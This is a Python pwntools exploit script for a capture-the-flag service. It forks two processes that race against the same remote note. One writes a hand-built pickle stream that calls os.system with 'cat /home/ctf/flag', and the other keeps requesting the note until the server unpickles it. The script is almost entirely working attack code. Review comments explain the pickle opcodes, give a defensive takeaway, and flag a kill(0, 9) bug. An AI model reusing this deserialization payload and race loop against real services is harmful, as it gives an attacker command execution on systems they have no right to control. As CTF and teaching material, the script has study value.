from pwn import *
from os import fork, kill
# Two-process race against a remote CTF service. After fork(), one process
# keeps submitting a hand-written pickle stream as the content of a note,
# while the other keeps requesting the same note until the first reply line
# no longer contains "[ERROR]".
# NOTE(review): the server code is not part of this file. The meaning of the
# menu choices and the exact check/use window being raced are inferred from
# the prompts answered below -- confirm against the challenge source.
# Defensive takeaway: a service that unpickles content a client can write
# gives that client command execution. Store such content in a data-only
# format (e.g. JSON) and do not let a per-mode check be separated from the
# later use of a file that another session can rewrite.
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25653

# Shell command placed in the pickle STRING operand sent by the writer loop.
PAYLOAD = "cat /home/ctf/flag"

# fork() returns the child's pid in the parent and 0 in the child, so the two
# branches below run concurrently in separate processes.
pid = fork()

if pid != 0:
    # Parent process: writer loop. One fresh connection per attempt.
    while True:
        conn = remote(HOST, PORT)
        # presumably the username prompt; both processes answer "didas"
        conn.sendlineafter(b":", b"didas")
        # Two menu answers of "1" (the reader answers "0" twice) -- presumably
        # these select a different mode/action than the reader; verify.
        conn.sendlineafter(b">>>", b"1")
        conn.sendlineafter(b">>>", b"1")
        # presumably the note name; the reader asks for the same "bomb"
        conn.sendlineafter(b":", b"bomb")
        conn.recvuntil(b":")
        # The next four lines together form a protocol-0 pickle stream:
        #   c os / system  -> GLOBAL opcode: push the callable os.system
        #   (              -> MARK
        #   S'<PAYLOAD>'   -> STRING operand
        #   t R .          -> TUPLE, REDUCE (call the callable), STOP
        # Any pickle.loads() on this text therefore runs os.system(PAYLOAD).
        conn.sendline(b"cos")
        conn.sendline(b"system")
        conn.sendline(("(S'"+PAYLOAD+"'").encode('utf-8'))
        conn.sendline(b"tR.")
        # Extra blank lines -- presumably terminate the multi-line content
        # input on the server side; confirm.
        conn.sendline(b"\n\n\n")
        conn.close()

else:
    # Child process (pid == 0 here): reader loop on the same user and note.
    while True:
        conn = remote(HOST, PORT)
        conn.sendlineafter(b":", b"didas")
        conn.sendlineafter(b">>>", b"0")
        conn.sendlineafter(b">>>", b"0")
        conn.sendlineafter(b":", b"bomb")
        # Only the first reply line is inspected.
        res = conn.recvline().decode('utf-8')
        # NOTE(review): conn is never closed in this branch, so every failed
        # attempt leaves one socket open for the life of the process.
        if "[ERROR]" not in res:
            print(res)
            # NOTE(review): pid is 0 in the child, and os.kill(0, sig)
            # signals every process in the caller's process group. This
            # SIGKILL reaches the parent writer, this process itself, and
            # anything else sharing the group (e.g. other stages of a shell
            # pipeline). os.getppid() would address the writer alone.
            kill(pid, 9)
            break